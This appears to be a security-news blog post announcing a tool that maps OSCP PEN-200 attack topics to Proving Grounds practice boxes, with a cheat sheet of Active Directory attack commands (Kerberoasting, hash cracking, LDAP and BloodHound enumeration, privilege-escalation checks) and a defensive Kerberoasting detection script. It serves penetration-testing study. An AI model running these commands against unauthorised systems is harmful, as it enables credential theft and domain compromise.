Exciting news for aspiring OSCP candidates and pentesting enthusiasts! A new web-based lookup tool has been launched to help match PEN-200 attack topics and study objectives with corresponding Proving Grounds (PG) practice boxes. This tool eliminates the hassle of manually searching through spreadsheets or markdown files, streamlining your preparation process.
🔗 Try it here: https://lnkd.in/gC7jjjVY
Current Features:
✔ 4 PG boxes integrated into the search engine
✔ Searchable tags including:
– `kerberoasting`
– `ldap`
– `lfi`
– `windowsPrivilegeEscalation`
– `MSSQL`
– `passwordCracking`
– `bloodhound`
– `smb`
– `ntds`
– `lateralMove`
– `activeDirectoryEnumeration`
– `tunneling`
– `silverTicket`
You Should Know:
1. Kerberoasting Attack (Windows)
```bash
# Extract SPN accounts
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>

# Crack hashes with Hashcat
hashcat -m 13100 hashes.txt rockyou.txt
```
2. LDAP Enumeration
```bash
# Using ldapsearch (-H with an LDAP URI replaces the deprecated -h option)
ldapsearch -x -H ldap://<DC_IP> -D "<USER>@<DOMAIN>" -w <PASSWORD> -b "dc=<DOMAIN>,dc=com"

# Using windapsearch
python3 windapsearch.py --dc-ip <DC_IP> -u <USER> -p <PASSWORD> --da
```
3. Windows Privilege Escalation
```cmd
REM Check for unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

REM Check for AlwaysInstallElevated
REM (the policy only takes effect when the same value is also set to 1 under HKLM)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
4. BloodHound & Active Directory Enumeration
```bash
# Collect data to ingest into BloodHound
bloodhound-python -d <DOMAIN> -u <USER> -p <PASSWORD> -c All -ns <DC_IP>
```
```cypher
// Neo4j query for shortest path to Domain Admin
// (BloodHound stores node names in upper case)
MATCH (u:User {name: "<USER>@<DOMAIN>"}), (g:Group {name: "DOMAIN ADMINS@<DOMAIN>"}),
      p = shortestPath((u)-[*1..]->(g))
RETURN p
```
5. Password Cracking with Hashcat
```bash
# Crack NTLM hashes
hashcat -m 1000 ntlm_hashes.txt rockyou.txt

# Crack Kerberos TGS tickets (KRB5TGS)
hashcat -m 13100 kerberoasting_hashes.txt /usr/share/wordlists/rockyou.txt
```
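The defender's side of sections 1 and 5, as an added example that is not part of the original post: hashcat mode 13100 targets RC4 (etype 23) service tickets, so a burst of Security event 4769 records with `TicketEncryptionType` 0x17 from a single account is the usual detection signal. The sample events, account names, the 5-minute window and the threshold of 3 are constructed assumptions; the field names follow the 4769 event data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 works on

def _ev(time, user, service, etype, status="0x0"):
    # Helper that builds one constructed, already-parsed 4769 record.
    return {"TimeCreated": f"2025-01-10T{time}", "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype, "Status": status}

# Constructed sample data, not taken from any real environment.
SAMPLE_EVENTS = [
    _ev("09:00:01", "asmith@CORP.EXAMPLE", "WS01$", "0x12"),
    _ev("09:00:05", "asmith@CORP.EXAMPLE", "svc_legacy", "0x17"),
    _ev("09:14:30", "jdoe@CORP.EXAMPLE", "svc_sql", "0x17"),
    _ev("09:14:31", "jdoe@CORP.EXAMPLE", "svc_web", "0x17"),
    _ev("09:14:31", "jdoe@CORP.EXAMPLE", "svc_backup", "0x17"),
    _ev("09:14:32", "jdoe@CORP.EXAMPLE", "DC01$", "0x17"),
    _ev("09:40:00", "asmith@CORP.EXAMPLE", "svc_web", "0x12"),
    _ev("11:30:00", "asmith@CORP.EXAMPLE", "svc_sql", "0x17"),
    _ev("14:00:00", "asmith@CORP.EXAMPLE", "svc_backup", "0x17"),
]

def find_kerberoast_suspects(events, window=timedelta(minutes=5), threshold=3):
    """Map each account to the distinct services it requested RC4 tickets for,
    when at least `threshold` distinct services fall inside one `window`."""
    per_account = defaultdict(list)
    for ev in events:
        service = ev["ServiceName"]
        if ev["Status"] != "0x0":
            continue  # only successfully issued tickets
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue  # AES tickets are the normal case in a modern domain
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # machine accounts and krbtgt are routine noise
        ts = datetime.fromisoformat(ev["TimeCreated"])
        per_account[ev["TargetUserName"]].append((ts, service))
    suspects = {}
    for account, reqs in per_account.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):  # sliding time window over sorted requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {s for _, s in reqs[start:end + 1]}
            if len(services) >= threshold:
                suspects.setdefault(account, set()).update(services)
    return {a: sorted(s) for a, s in suspects.items()}

if __name__ == "__main__":
    print(find_kerberoast_suspects(SAMPLE_EVENTS))
```

Accounts with a legitimate need for RC4 tickets will show up as well, so the window and threshold need tuning against a baseline of normal 4769 traffic.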
What Undercode Says:
This tool is a game-changer for OSCP aspirants, reducing time wasted on manual searches. The integration of Proving Grounds machines with PEN-200 topics ensures structured learning. Future updates, like custom DNS support, will further enhance usability.
For hands-on practice, always verify techniques in isolated labs before real engagements.
Expected Output:
A structured lookup system that accelerates OSCP preparation by mapping attack techniques to relevant practice machines. Keep an eye on updates for new tags and boxes!
🔗 Access the tool: https://lnkd.in/gC7jjjVY
References:
Reported By: Activity 7320536893165600770 – Hackers Feeds